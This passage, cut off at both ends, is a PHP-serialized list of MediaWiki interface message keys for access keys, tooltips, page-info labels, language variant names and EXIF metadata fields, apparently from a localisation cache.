st-pagetext-frameworks\";i:2335;s:29:\"javascripttest-pagetext-skins\";i:2336;s:25:\"javascripttest-qunit-name\";i:2337;s:26:\"javascripttest-qunit-intro\";i:2338;s:21:\"accesskey-pt-userpage\";i:2339;s:25:\"accesskey-pt-anonuserpage\";i:2340;s:19:\"accesskey-pt-mytalk\";i:2341;s:21:\"accesskey-pt-anontalk\";i:2342;s:24:\"accesskey-pt-preferences\";i:2343;s:22:\"accesskey-pt-watchlist\";i:2344;s:22:\"accesskey-pt-mycontris\";i:2345;s:18:\"accesskey-pt-login\";i:2346;s:19:\"accesskey-pt-logout\";i:2347;s:17:\"accesskey-ca-talk\";i:2348;s:17:\"accesskey-ca-edit\";i:2349;s:23:\"accesskey-ca-addsection\";i:2350;s:23:\"accesskey-ca-viewsource\";i:2351;s:20:\"accesskey-ca-history\";i:2352;s:20:\"accesskey-ca-protect\";i:2353;s:22:\"accesskey-ca-unprotect\";i:2354;s:19:\"accesskey-ca-delete\";i:2355;s:21:\"accesskey-ca-undelete\";i:2356;s:17:\"accesskey-ca-move\";i:2357;s:18:\"accesskey-ca-watch\";i:2358;s:20:\"accesskey-ca-unwatch\";i:2359;s:16:\"accesskey-search\";i:2360;s:19:\"accesskey-search-go\";i:2361;s:25:\"accesskey-search-fulltext\";i:2362;s:16:\"accesskey-p-logo\";i:2363;s:20:\"accesskey-n-mainpage\";i:2364;s:32:\"accesskey-n-mainpage-description\";i:2365;s:18:\"accesskey-n-portal\";i:2366;s:25:\"accesskey-n-currentevents\";i:2367;s:25:\"accesskey-n-recentchanges\";i:2368;s:22:\"accesskey-n-randompage\";i:2369;s:16:\"accesskey-n-help\";i:2370;s:25:\"accesskey-t-whatlinkshere\";i:2371;s:31:\"accesskey-t-recentchangeslinked\";i:2372;s:18:\"accesskey-feed-rss\";i:2373;s:19:\"accesskey-feed-atom\";i:2374;s:25:\"accesskey-t-contributions\";i:2375;s:21:\"accesskey-t-emailuser\";i:2376;s:21:\"accesskey-t-permalink\";i:2377;s:17:\"accesskey-t-print\";i:2378;s:18:\"accesskey-t-upload\";i:2379;s:24:\"accesskey-t-specialpages\";i:2380;s:23:\"accesskey-ca-nstab-main\";i:2381;s:23:\"accesskey-ca-nstab-user\";i:2382;s:24:\"accesskey-ca-nstab-media\";i:2383;s:26:\"accesskey-ca-nstab-special\";i:2384;s:26:\"accesskey-ca-nstab-project\";i:2385;s:24:\"accesskey-ca-nstab-image\";i:2386;s:28:\"accesskey-ca-nstab-mediawiki\";i:2387;s:27:\"accesskey-ca-nstab-template\";i:2388;s:23:\"accesskey-ca-nstab-help\";i:2389;s:27:\"accesskey-ca-nstab-category\";i:2390;s:19:\"accesskey-minoredit\";i:2391;s:14:\"accesskey-save\";i:2392;s:17:\"accesskey-preview\";i:2393;s:14:\"accesskey-diff\";i:2394;s:33:\"accesskey-compareselectedversions\";i:2395;s:15:\"accesskey-watch\";i:2396;s:16:\"accesskey-upload\";i:2397;s:26:\"accesskey-preferences-save\";i:2398;s:17:\"accesskey-summary\";i:2399;s:24:\"accesskey-userrights-set\";i:2400;s:23:\"accesskey-blockip-block\";i:2401;s:16:\"accesskey-export\";i:2402;s:16:\"accesskey-import\";i:2403;s:37:\"accesskey-watchlistedit-normal-submit\";i:2404;s:34:\"accesskey-watchlistedit-raw-submit\";i:2405;s:19:\"tooltip-pt-userpage\";i:2406;s:23:\"tooltip-pt-anonuserpage\";i:2407;s:17:\"tooltip-pt-mytalk\";i:2408;s:19:\"tooltip-pt-anontalk\";i:2409;s:22:\"tooltip-pt-preferences\";i:2410;s:20:\"tooltip-pt-watchlist\";i:2411;s:20:\"tooltip-pt-mycontris\";i:2412;s:16:\"tooltip-pt-login\";i:2413;s:17:\"tooltip-pt-logout\";i:2414;s:15:\"tooltip-ca-talk\";i:2415;s:15:\"tooltip-ca-edit\";i:2416;s:21:\"tooltip-ca-addsection\";i:2417;s:21:\"tooltip-ca-viewsource\";i:2418;s:18:\"tooltip-ca-history\";i:2419;s:18:\"tooltip-ca-protect\";i:2420;s:20:\"tooltip-ca-unprotect\";i:2421;s:17:\"tooltip-ca-delete\";i:2422;s:19:\"tooltip-ca-undelete\";i:2423;s:15:\"tooltip-ca-move\";i:2424;s:16:\"tooltip-ca-watch\";i:2425;s:18:\"tooltip-ca-unwatch\";i:2426;s:14:\"tooltip-search\";i:2427;s:17:\"tooltip-search-go\";i:2428;s:23:\"tooltip-search-fulltext\";i:2429;s:14:\"tooltip-p-logo\";i:2430;s:18:\"tooltip-n-mainpage\";i:2431;s:30:\"tooltip-n-mainpage-description\";i:2432;s:16:\"tooltip-n-portal\";i:2433;s:23:\"tooltip-n-currentevents\";i:2434;s:23:\"tooltip-n-recentchanges\";i:2435;s:20:\"tooltip-n-randompage\";i:2436;s:14:\"tooltip-n-help\";i:2437;s:23:\"tooltip-t-whatlinkshere\";i:2438;s:29:\"tooltip-t-recentchangeslinked\";i:2439;s:16:\"tooltip-feed-rss\";i:2440;s:17:\"tooltip-feed-atom\";i:2441;s:23:\"tooltip-t-contributions\";i:2442;s:19:\"tooltip-t-emailuser\";i:2443;s:16:\"tooltip-t-upload\";i:2444;s:22:\"tooltip-t-specialpages\";i:2445;s:15:\"tooltip-t-print\";i:2446;s:19:\"tooltip-t-permalink\";i:2447;s:21:\"tooltip-ca-nstab-main\";i:2448;s:21:\"tooltip-ca-nstab-user\";i:2449;s:22:\"tooltip-ca-nstab-media\";i:2450;s:24:\"tooltip-ca-nstab-special\";i:2451;s:24:\"tooltip-ca-nstab-project\";i:2452;s:22:\"tooltip-ca-nstab-image\";i:2453;s:26:\"tooltip-ca-nstab-mediawiki\";i:2454;s:25:\"tooltip-ca-nstab-template\";i:2455;s:21:\"tooltip-ca-nstab-help\";i:2456;s:25:\"tooltip-ca-nstab-category\";i:2457;s:17:\"tooltip-minoredit\";i:2458;s:12:\"tooltip-save\";i:2459;s:15:\"tooltip-preview\";i:2460;s:12:\"tooltip-diff\";i:2461;s:31:\"tooltip-compareselectedversions\";i:2462;s:13:\"tooltip-watch\";i:2463;s:35:\"tooltip-watchlistedit-normal-submit\";i:2464;s:32:\"tooltip-watchlistedit-raw-submit\";i:2465;s:16:\"tooltip-recreate\";i:2466;s:14:\"tooltip-upload\";i:2467;s:16:\"tooltip-rollback\";i:2468;s:12:\"tooltip-undo\";i:2469;s:24:\"tooltip-preferences-save\";i:2470;s:15:\"tooltip-summary\";i:2471;s:24:\"interlanguage-link-title\";i:2472;s:33:\"interlanguage-link-title-langonly\";i:2473;s:32:\"interlanguage-link-title-nonlang\";i:2474;s:36:\"interlanguage-link-title-nonlangonly\";i:2475;s:10:\"common.css\";i:2476;s:9:\"print.css\";i:2477;s:12:\"noscript.css\";i:2478;s:23:\"group-autoconfirmed.css\";i:2479;s:14:\"group-user.css\";i:2480;s:13:\"group-bot.css\";i:2481;s:15:\"group-sysop.css\";i:2482;s:20:\"group-bureaucrat.css\";i:2483;s:9:\"common.js\";i:2484;s:22:\"group-autoconfirmed.js\";i:2485;s:13:\"group-user.js\";i:2486;s:12:\"group-bot.js\";i:2487;s:14:\"group-sysop.js\";i:2488;s:19:\"group-bureaucrat.js\";i:2489;s:9:\"anonymous\";i:2490;s:8:\"siteuser\";i:2491;s:8:\"anonuser\";i:2492;s:16:\"lastmodifiedatby\";i:2493;s:13:\"othercontribs\";i:2494;s:6:\"others\";i:2495;s:9:\"siteusers\";i:2496;s:9:\"anonusers\";i:2497;s:11:\"creditspage\";i:2498;s:9:\"nocredits\";i:2499;s:19:\"spamprotectiontitle\";i:2500;s:18:\"spamprotectiontext\";i:2501;s:19:\"spamprotectionmatch\";i:2502;s:16:\"spambot_username\";i:2503;s:14:\"spam_reverting\";i:2504;s:13:\"spam_blanking\";i:2505;s:13:\"spam_deleting\";i:2506;s:20:\"simpleantispam-label\";i:2507;s:15:\"pageinfo-header\";i:2508;s:14:\"pageinfo-title\";i:2509;s:20:\"pageinfo-not-current\";i:2510;s:21:\"pageinfo-header-basic\";i:2511;s:21:\"pageinfo-header-edits\";i:2512;s:28:\"pageinfo-header-restrictions\";i:2513;s:26:\"pageinfo-header-properties\";i:2514;s:22:\"pageinfo-display-title\";i:2515;s:21:\"pageinfo-default-sort\";i:2516;s:15:\"pageinfo-length\";i:2517;s:19:\"pageinfo-article-id\";i:2518;s:17:\"pageinfo-language\";i:2519;s:22:\"pageinfo-content-model\";i:2520;s:21:\"pageinfo-robot-policy\";i:2521;s:20:\"pageinfo-robot-index\";i:2522;s:22:\"pageinfo-robot-noindex\";i:2523;s:14:\"pageinfo-views\";i:2524;s:17:\"pageinfo-watchers\";i:2525;s:21:\"pageinfo-few-watchers\";i:2526;s:23:\"pageinfo-redirects-name\";i:2527;s:24:\"pageinfo-redirects-value\";i:2528;s:22:\"pageinfo-subpages-name\";i:2529;s:23:\"pageinfo-subpages-value\";i:2530;s:18:\"pageinfo-firstuser\";i:2531;s:18:\"pageinfo-firsttime\";i:2532;s:17:\"pageinfo-lastuser\";i:2533;s:17:\"pageinfo-lasttime\";i:2534;s:14:\"pageinfo-edits\";i:2535;s:16:\"pageinfo-authors\";i:2536;s:21:\"pageinfo-recent-edits\";i:2537;s:23:\"pageinfo-recent-authors\";i:2538;s:20:\"pageinfo-magic-words\";i:2539;s:26:\"pageinfo-hidden-categories\";i:2540;s:18:\"pageinfo-templates\";i:2541;s:22:\"pageinfo-transclusions\";i:2542;s:15:\"pageinfo-footer\";i:2543;s:20:\"pageinfo-toolboxlink\";i:2544;s:20:\"pageinfo-redirectsto\";i:2545;s:25:\"pageinfo-redirectsto-info\";i:2546;s:20:\"pageinfo-contentpage\";i:2547;s:24:\"pageinfo-contentpage-yes\";i:2548;s:26:\"pageinfo-protect-cascading\";i:2549;s:30:\"pageinfo-protect-cascading-yes\";i:2550;s:31:\"pageinfo-protect-cascading-from\";i:2551;s:22:\"pageinfo-category-info\";i:2552;s:23:\"pageinfo-category-pages\";i:2553;s:25:\"pageinfo-category-subcats\";i:2554;s:23:\"pageinfo-category-files\";i:2555;s:19:\"markaspatrolleddiff\";i:2556;s:19:\"markaspatrolledlink\";i:2557;s:19:\"markaspatrolledtext\";i:2558;s:17:\"markedaspatrolled\";i:2559;s:21:\"markedaspatrolledtext\";i:2560;s:16:\"rcpatroldisabled\";i:2561;s:20:\"rcpatroldisabledtext\";i:2562;s:22:\"markedaspatrollederror\";i:2563;s:26:\"markedaspatrollederrortext\";i:2564;s:35:\"markedaspatrollederror-noautopatrol\";i:2565;s:23:\"markedaspatrollednotify\";i:2566;s:28:\"markedaspatrollederrornotify\";i:2567;s:15:\"patrol-log-page\";i:2568;s:17:\"patrol-log-header\";i:2569;s:20:\"log-show-hide-patrol\";i:2570;s:15:\"deletedrevision\";i:2571;s:21:\"filedeleteerror-short\";i:2572;s:20:\"filedeleteerror-long\";i:2573;s:18:\"filedelete-missing\";i:2574;s:27:\"filedelete-old-unregistered\";i:2575;s:31:\"filedelete-current-unregistered\";i:2576;s:28:\"filedelete-archive-read-only\";i:2577;s:12:\"previousdiff\";i:2578;s:8:\"nextdiff\";i:2579;s:12:\"mediawarning\";i:2580;s:12:\"imagemaxsize\";i:2581;s:9:\"thumbsize\";i:2582;s:11:\"widthheight\";i:2583;s:15:\"widthheightpage\";i:2584;s:9:\"file-info\";i:2585;s:14:\"file-info-size\";i:2586;s:20:\"file-info-size-pages\";i:2587;s:12:\"file-nohires\";i:2588;s:13:\"svg-long-desc\";i:2589;s:22:\"svg-long-desc-animated\";i:2590;s:14:\"svg-long-error\";i:2591;s:14:\"show-big-image\";i:2592;s:22:\"show-big-image-preview\";i:2593;s:20:\"show-big-image-other\";i:2594;s:19:\"show-big-image-size\";i:2595;s:20:\"file-info-gif-looped\";i:2596;s:20:\"file-info-gif-frames\";i:2597;s:20:\"file-info-png-looped\";i:2598;s:20:\"file-info-png-repeat\";i:2599;s:20:\"file-info-png-frames\";i:2600;s:23:\"file-no-thumb-animation\";i:2601;s:27:\"file-no-thumb-animation-gif\";i:2602;s:9:\"newimages\";i:2603;s:13:\"newimagestext\";i:2604;s:13:\"imagelisttext\";i:2605;s:17:\"newimages-summary\";i:2606;s:16:\"newimages-legend\";i:2607;s:15:\"newimages-label\";i:2608;s:18:\"newimages-showbots\";i:2609;s:8:\"noimages\";i:2610;s:8:\"ilsubmit\";i:2611;s:6:\"bydate\";i:2612;s:21:\"sp-newimages-showfrom\";i:2613;s:10:\"video-dims\";i:2614;s:14:\"seconds-abbrev\";i:2615;s:14:\"minutes-abbrev\";i:2616;s:12:\"hours-abbrev\";i:2617;s:11:\"days-abbrev\";i:2618;s:7:\"seconds\";i:2619;s:7:\"minutes\";i:2620;s:5:\"hours\";i:2621;s:4:\"days\";i:2622;s:5:\"weeks\";i:2623;s:6:\"months\";i:2624;s:5:\"years\";i:2625;s:3:\"ago\";i:2626;s:8:\"just-now\";i:2627;s:9:\"hours-ago\";i:2628;s:11:\"minutes-ago\";i:2629;s:11:\"seconds-ago\";i:2630;s:9:\"monday-at\";i:2631;s:10:\"tuesday-at\";i:2632;s:12:\"wednesday-at\";i:2633;s:11:\"thursday-at\";i:2634;s:9:\"friday-at\";i:2635;s:11:\"saturday-at\";i:2636;s:9:\"sunday-at\";i:2637;s:8:\"today-at\";i:2638;s:12:\"yesterday-at\";i:2639;s:14:\"bad_image_list\";i:2640;s:19:\"variantname-zh-hans\";i:2641;s:19:\"variantname-zh-hant\";i:2642;s:17:\"variantname-zh-cn\";i:2643;s:17:\"variantname-zh-tw\";i:2644;s:17:\"variantname-zh-hk\";i:2645;s:17:\"variantname-zh-mo\";i:2646;s:17:\"variantname-zh-sg\";i:2647;s:17:\"variantname-zh-my\";i:2648;s:14:\"variantname-zh\";i:2649;s:20:\"variantname-gan-hans\";i:2650;s:20:\"variantname-gan-hant\";i:2651;s:15:\"variantname-gan\";i:2652;s:17:\"variantname-sr-ec\";i:2653;s:17:\"variantname-sr-el\";i:2654;s:14:\"variantname-sr\";i:2655;s:17:\"variantname-kk-kz\";i:2656;s:17:\"variantname-kk-tr\";i:2657;s:17:\"variantname-kk-cn\";i:2658;s:19:\"variantname-kk-cyrl\";i:2659;s:19:\"variantname-kk-latn\";i:2660;s:19:\"variantname-kk-arab\";i:2661;s:14:\"variantname-kk\";i:2662;s:19:\"variantname-ku-arab\";i:2663;s:19:\"variantname-ku-latn\";i:2664;s:14:\"variantname-ku\";i:2665;s:19:\"variantname-tg-cyrl\";i:2666;s:19:\"variantname-tg-latn\";i:2667;s:14:\"variantname-tg\";i:2668;s:20:\"variantname-ike-cans\";i:2669;s:20:\"variantname-ike-latn\";i:2670;s:14:\"variantname-iu\";i:2671;s:20:\"variantname-shi-tfng\";i:2672;s:20:\"variantname-shi-latn\";i:2673;s:15:\"variantname-shi\";i:2674;s:14:\"variantname-uz\";i:2675;s:19:\"variantname-uz-latn\";i:2676;s:19:\"variantname-uz-cyrl\";i:2677;s:8:\"metadata\";i:2678;s:13:\"metadata-help\";i:2679;s:15:\"metadata-expand\";i:2680;s:17:\"metadata-collapse\";i:2681;s:15:\"metadata-fields\";i:2682;s:17:\"metadata-langitem\";i:2683;s:25:\"metadata-langitem-default\";i:2684;s:15:\"exif-imagewidth\";i:2685;s:16:\"exif-imagelength\";i:2686;s:18:\"exif-bitspersample\";i:2687;s:16:\"exif-compression\";i:2688;s:30:\"exif-photometricinterpretation\";i:2689;s:16:\"exif-orientation\";i:2690;s:20:\"exif-samplesperpixel\";i:2691;s:24:\"exif-planarconfiguration\";i:2692;s:21:\"exif-ycbcrsubsampling\";i:2693;s:21:\"exif-ycbcrpositioning\";i:2694;s:16:\"exif-xresolution\";i:2695;s:16:\"exif-yresolution\";i:2696;s:17:\"exif-stripoffsets\";i:2697;s:17:\"exif-rowsperstrip\";i:2698;s:20:\"exif-stripbytecounts\";i:2699;s:26:\"exif-jpeginterchangeformat\";i:2700;s:32:\"exif-jpeginterchangeformatlength\";i:2701;s:15:\"exif-whitepoint\";i:2702;s:26:\"exif-primarychromaticities\";i:2703;s:22:\"exif-ycbcrcoefficients\";i:2704;s:24:\"exif-referenceblackwhite\";i:2705;s:13:\"exif-datetime\";i:2706;s:21:\"exif-imagedescription\";i:2707;s:9:\"exif-make\";i:2708;s:10:\"exif-model\";i:2709;s:13:\"exif-software\";i:2710;s:11:\"exif-artist\";i:2711;s:14:\"exif-copyright\";i:2712;s:16:\"exif-exifversion\";i:2713;s:20:\"exif-flashpixversion\";i:2714;s:15:\"exif-colorspace\";i:2715;s:28:\"exif-componentsconfiguration\";i:2716;s:27:\"exif-compressedbitsperpixel\";i:2717;s:20:\"exif-pixelydimension\";i:2718;s:20:\"exif-pixelxdimension\";i:2719;s:16:\"exif-usercomment\";i:2720;s:21:\"exif-relatedsoundfile\";i:2721;s:21:\"exif-datetimeoriginal\";i:2722;s:22:\"exif-datetimedigitized\";i:2723;s:15:\"exif-subsectime\";i:2724;s:23:\"exif-subsectimeoriginal\";i:2725;s:24:\"exif-subsectimedigitized\";i:2726;s:17:\"exif-exposuretime\";i:2727;s:24:\"exif-exposuretime-format\";i:2728;s:12:\"exif-fnumber\";i:2729;s:19:\"exif-fnumber-format\";i:2730;s:20:\"exif-exposureprogram\";i:2731;s:24:\"exif-spectralsensitivity\";i:2732;s:20:\"exif-isospeedratings\";i:2733;s:22:\"exif-shutterspeedvalue\";i:2734;s:18:\"exif-aperturevalue\";i:2735;s:20:\"exif-brightnessvalue\";i:2736;s:22:\"exif-exposurebiasvalue\";i:2737;s:21:\"exif-maxaperturevalue\";i:2738;s:20:\"exif-subjectdistance\";i:2739;s:17:\"exif-meteringmode\";i:2740;s:16:\"exif-lightsource\";i:2741;s:10:\"exif-flash\";i:2742;s:16:\"exif-focallength\";i:2743;s:23:\"exif-focallength-format\";i:2744;s:16:\"exif-subjectarea\";i:2745;s:16:\"exif-flashenergy\";i:2746;s:26:\"exif-focalplanexresolution\";i:2747;s:26:\"exif-focalplaneyresolution\";i:2748;s:29:\"exif-focalplaneresolutionunit\";i:2749;s:20:\"exif-subjectlocation\";i:2750;s:18:\"exif-exposureindex\";i:2751;s:18:\"exif-sensingmethod\";i:2752;s:15:\"exif-filesource\";i:2753;s:14:\"exif-scenetype\";i:2754;s:19:\"exif-customrendered\";i:2755;s:17:\"exif-exposuremode\";i:2756;s:17:\"exif-whitebalance\";i:2757;s:21:\"exif-digitalzoomratio\";i:2758;s:26:\"exif-focallengthin35mmfilm\";i:2759;s:21:\"exif-scenecapturetype\";i:2760;s:16:\"exif-gaincontrol\";i:2761;s:13:\"exif-contrast\";i:2762;s:15:\"exif-saturation\";i:2763;s:14:\"exif-sharpness\";i:2764;s:29:\"exif-devicesettingdescription\";i:2765;s:25:\"exif-subjectdistancerange\";i:2766;s:18:\"exif-imageuniqueid\";i:2767;s:17:\"exif-gpsversionid\";i:2768;s:19:\"exif-gpslatituderef\";i:2769;s:16:\"exif-gpslatitude\";i:2770;s:20:\"exif-gpslongituderef\";i:2771;s:17:\"exif-gpslongitude\";i:2772;s:19:\"exif-gpsaltituderef\";i:2773;s:16:\"exif-gpsaltitude\";i:2774;s:17:\"exif-gpstimestamp\";i:2775;s:18:\"exif-gpssatellites\";i:2776;s:14:\"exif-gpsstatus\";i:2777;s:19:\"exif-gpsmeasuremode\";i:2778;s:11:\"exif-gpsdop\";i:2779;s:16:\"exif-gpsspeedref\";i:2780;s:13:\"exif-gpsspeed\";i:2781;s:16:\"exif-gpstrackref\";i:2782;s:13:\"exif-gpstrack\";i:2783;s:23:\"exif-gpsimgdirectionref\";i:2784;s:20:\"exif-gpsimgdirection\";i:2785;s:16:\"exif-gpsmapdatum\";i:2786;s:23:\"exif-gpsdestlatituderef\";i:2787;s:20:\"exif-gpsdestlatitude\";i:2788;s:24:\"exif-gpsdestlongituderef\";i:2789;s:21:\"exif-gpsdestlongitude\";i:2790;s:22:\"exif-gpsdestbearingref\";i:2791;s:19:\"exif-gpsdestbearing\";i:2792;s:23:\"exif-gpsdestdistanceref\";i:2793;s:20:\"exif-gpsdestdistance\";i:2794;s:24:\"exif-gpsprocessingmethod\";i:2795;s:23:\"exif-gpsareainformation\";i:2796;s:17:\"exif-gpsdatestamp\";i:2797;s:20:\"exif-gpsdifferential\";i:2798;s:22:\"exif-coordinate-format\";i:2799;s:20:\"exif-jpegfilecomment\";i:2800;s:13:\"exif-keywords\";i:2801;s:23:\"exif-worldregioncreated\";i:2802;s:19:\"exif-countrycreated\";i:2803;s:23:\"exif-countrycodecreated\";i:2804;s:27:\"exif-provinceorstatecreated\";i:2805;s:16:\"exif-citycreated\";i:2806;s:23:\"exif-sublocationcreated\";i:2807;s:20:\"exif-worldregiondest\";i:2808;s:16:\"exif-countrydest\";i:2809;s:20:\"exif-countrycodedest\";i:2810;s:24:\"exif-provinceorstatedest\";i:2811;s:13:\"exif-citydest\";i:2812;s:20:\"exif-sublocationdest\";i:2813;s:15:\"exif-objectname\";i:2814;s:24:\"exif-specialinstructions\";i:2815;s:13:\"exif-headline\";i:2816;s:11:\"exif-credit\";i:2817;s:11:\"exif-source\";i:2818;s:15:\"exif-editstatus\";i:2819;s:12:\"exif-urgency\";i:2820;s:22:\"exif-fixtureidentifier\";i:2821;s:17:\"exif-locationdest\";i:2822;s:21:\"exif-locationdestcode\";i:2823;s:16:\"exif-objectcycle\";i:2824;s:12:\"exif-contact\";i:2825;s:11:\"exif-writer\";i:2826;s:17:\"exif-languagecode\";i:2827;s:15:\"exif-iimversion\";i:2828;s:16:\"exif-iimcategory\";i:2829;s:28:\"exif-iimsupplementalcategory\";i:2830;s:20:\"exif-datetimeexpires\";i:2831;s:21:\"exif-datetimereleased\";i:2832;s:28:\"exif-originaltransmissionref\";i:2833;s:15:\"exif-identifier\";i:2834;s:9:\"exif-lens\";i:2835;s:17:\"exif-serialnumber\";i:2836;s:20:\"exif-cameraownername\";i:2837;s:10:\"exif-label\";i:2838;s:21:\"exif-datetimemetadata\";i:2839;s:13:\"exif-nickname\";i:2840;s:11:\"exif-rating\";i:2841;s:22:\"exif-rightscertificate\";i:2842;s:16:\"exif-copyrighted\";i:2843;s:19:\"exif-copyrightowner\";i:2844;s:15:\"exif-usageterms\";i:2845;s:17:\"exif-webstatement\";i:2846;s:23:\"exif-originaldocumentid\";i:2847;s:15:\"exif-licenseurl\";i:2848;s:23:\"exif-morepermissionsurl\";i:2849;s:19:\"exif-attributionurl\";i:2850;s:29:\"exif-preferredattributionname\";i:2851;s:19:\"exif-pngfilecomment\";i:2852;s:15:\"exif-disclaimer\";i:2853;s:19:\"exif-contentwarning\";i:2854;s:19:\"exif-giffilecomment\";i:2855;s:22:\"exif-intellectualgenre\";i:2856;s:20:\"exif-subjectnewscode\";i:2857;s:14:\"exif-scenecode\";i:2858;s:10:\"exif-event\";i:2859;s:24:\"exif-organisationinimage\";i:2860;s:18:\"exif-personinimage\";i:2861;s:24:\"exif-originalimageheight\";i:2862;s:23:\"exif-originalimagewidth\";i:2863;s:15:\"exif-make-value\";i:2864;s:16:\"exif-model-value\";i:2865;s:19:\"exif-software-value\";i:2866;s:27:\"exif-software-version-value\";i:2867;s:18:\"exif-contact-value\";i:2868;s:26:\"exif-subjectnewscode-value\";i:2869;s:18:\"exif-compression-1\";i:2870;s:18:\"exif-compression-2\";i:2871;s:18:\"exif-compression-3\";i:2872;s:18:\"exif-compression-4\";i:2873;s:18:\"exif-compression-5\";i:2874;s:18:\"exif-compression-6\";i:2875;s:18:\"exif-compression-7\";i:2876;s:18:\"exif-compression-8\";i:2877;s:22:\"exif-compression-32773\";i:2878;s:22:\"exif-compression-32946\";i:2879;s:22:\"exif-compression-34712\";i:2880;s:21:\"exif-copyrighted-true\";i:2881;s:22:\"exif-copyrighted-false\";i:2882;s:32:\"exif-photometricinterpretation-2\";i:2883;s:32:\"exif-photometricinterpretation-6\";i:2884;s:16:\"exif-unknowndate\";i:2885;s:18:\"exif-orientation-1\";i:2886;s:18:\"exif-orientation-2\";i:2887;s:18:\"exif-orientation-3\";i:2888;s:18:\"exif-orientation-4\";i:2889;s:18:\"exif-orientation-5\";i:2890;s:18:\"exif-orientation-6\";i:2891;s:18:\"exif-orientation-7\";i:2892;s:18:\"exif-orientation-8\";i:2893;s:26:\"exif-planarconfiguration-1\";i:2894;s:26:\"exif-planarconfiguration-2\";i:2895;s:19:\"exif-xyresolution-i\";i:2896;s:19:\"exif-xyresolution-c\";i:2897;s:17:\"exif-colorspace-1\";i:2898;s:21:\"exif-colorspace-65535\";i:2899;s:30:\"exif-componentsconfiguration-0\";i:2900;s:30:\"exif-componentsconfiguration-1\";i:2901;s:30:\"exif-componentsconfiguration-2\";i:2902;s:30:\"exif-componentsconfiguration-3\";i:2903;s:30:\"exif-componentsconfiguration-4\";i:2904;s:30:\"exif-componentsconfiguration-5\";i:2905;s:30:\"exif-componentsconfiguration-6\";i:2906;s:22:\"exif-exposureprogram-0\";i:2907;s:22:\"exif-exposureprogram-1\";i:2908;s:22:\"exif-exposureprogram-2\";i:2909;s:22:\"exif-exposureprogram-3\";i:2910;s:22:\"exif-exposureprogram-4\";i:2911;s:22:\"exif-exposureprogram-5\";i:2912;s:22:\"exif-exposureprogram-6\";i:2913;s:22:\"exif-exposureprogram-7\";i:2914;s:22:\"exif-exposureprogram-8\";i:2915;s:26:\"exif-subjectdistance-value\";i:2916;s:19:\"exif-meteringmode-0\";i:2917;s:19:\"exif-meteringmode-1\";i:2918;s:19:\"exif-meteringmode-2\";i:2919;s:19:\"exif-meteringmode-3\";i:2920;s:19:\"exif-meteringmode-4\";i:2921;s:19:\"exif-meteringmode-5\";i:2922;s:19:\"exif-meteringmode-6\";i:2923;s:21:\"exif-meteringmode-255\";i:2924;s:18:\"exif-lightsource-0\";i:2925;s:18:\"exif-lightsource-1\";i:2926;s:18:\"exif-lightsource-2\";i:2927;s:18:\"exif-lightsource-3\";i:2928;s:18:\"exif-lightsource-4\";i:2929;s:18:\"exif-lightsource-9\";i:2930;s:19:\"exif-lightsource-10\";i:2931;s:19:\"exif-lightsource-11\";i:2932;s:19:\"exif-lightsource-12\";i:2933;s:19:\"exif-lightsource-13\";i:2934;s:19:\"exif-lightsource-14\";i:2935;s:19:\"exif-lightsource-15\";i:2936;s:19:\"exif-lightsource-17\";i:2937;s:19:\"exif-lightsource-18\";i:2938;s:19:\"exif-lightsource-19\";i:2939;s:19:\"exif-lightsource-20\";i:2940;s:19:\"exif-lightsource-21\";i:2941;s:19:\"exif-lightsource-22\";i:2942;s:19:\"exif-lightsource-23\";i:2943;s:19:\"exif-lightsource-24\";i:2944;s:20:\"exif-lightsource-255\";i:2945;s:18:\"exif-flash-fired-0\";i:2946;s:18:\"exif-flash-fired-1\";i:2947;s:19:\"exif-flash-return-0\";i:2948;s:19:\"exif-flash-return-2\";i:2949;s:19:\"exif-flash-return-3\";i:2950;s:17:\"exif-flash-mode-1\";i:2951;s:17:\"exif-flash-mode-2\";i:2952;s:17:\"exif-flash-mode-3\";i:2953;s:21:\"exif-flash-function-1\";i:2954;s:19:\"exif-flash-redeye-1\";i:2955;s:31:\"exif-focalplaneresolutionunit-2\";i:2956;s:20:\"exif-sensingmethod-1\";i:2957;s:20:\"exif-sensingmethod-2\";i:2958;s:20:\"exif-sensingmethod-3\";i:2959;s:20:\"exif-sensingmethod-4\";i:2960;s:20:\"exif-sensingmethod-5\";i:2961;s:20:\"exif-sensingmethod-7\";i:2962;s:20:\"exif-sensingmethod-8\";i:2963;s:17:\"exif-filesource-3\";i:2964;s:16:\"exif-scenetype-1\";i:2965;s:21:\"exif-customrendered-0\";i:2966;s:21:\"exif-customrendered-1\";i:2967;s:19:\"exif-exposuremode-0\";i:2968;s:19:\"exif-exposuremode-1\";i:2969;s:19:\"exif-exposuremode-2\";i:2970;s:19:\"exif-whitebalance-0\";i:2971;s:19:\"exif-whitebalance-1\";i:2972;s:23:\"exif-scenecapturetype-0\";i:2973;s:23:\"exif-scenecapturetype-1\";i:2974;s:23:\"exif-scenecapturetype-2\";i:2975;s:23:\"exif-scenecapturetype-3\";i:2976;s:18:\"exif-gaincontrol-0\";i:2977;s:18:\"exif-gaincontrol-1\";i:2978;s:18:\"exif-gaincontrol-2\";i:2979;s:18:\"exif-gaincontrol-3\";i:2980;s:18:\"exif-gaincontrol-4\";i:2981;s:15:\"exif-contrast-0\";i:2982;s:15:\"exif-contrast-1\";i:2983;s:15:\"exif-contrast-2\";i:2984;s:17:\"exif-saturation-0\";i:2985;s:17:\"exif-saturation-1\";i:2986;s:17:\"exif-saturation-2\";i:2987;s:16:\"exif-sharpness-0\";i:2988;s:16:\"exif-sharpness-1\";i:2989;s:16:\"exif-sharpness-2\";i:2990;s:27:\"exif-subjectdistancerange-0\";i:2991;s:27:\"exif-subjectdistancerange-1\";i:2992;s:27:\"exif-subjectdistancerange-2\";i:2993;s:27:\"exif-subjectdistancerange-3\";i:2994;s:18:\"exif-gpslatitude-n\";i:2995;s:18:\"exif-gpslatitude-s\";i:2996;s:19:\"exif-gpslongitude-e\";i:2997;s:19:\"exif-gpslongitude-w\";i:2998;s:31:\"exif-gpsaltitude-above-sealevel\";i:2999;s:31:\"exif-gpsaltitude-below-sealevel\";i:3000;s:16:\"exif-gpsstatus-a\";i:3001;s:16:\"exif-gpsstatus-v\";i:3002;s:21:\"exif-gpsmeasuremode-2\";i:3003;s:21:\"exif-gpsmeasuremode-3\";i:3004;s:15:\"exif-gpsspeed-k\";i:3005;s:15:\"exif-gpsspeed-m\";i:3006;s:15:\"exif-gpsspeed-n\";i:3007;s:22:\"exif-gpsdestdistance-k\";i:3008;s:22:\"exif-gpsdestdistance-m\";i:3009;s:22:\"exif-gpsdestdistance-n\";i:3010;s:21:\"exif-gpsdop-excell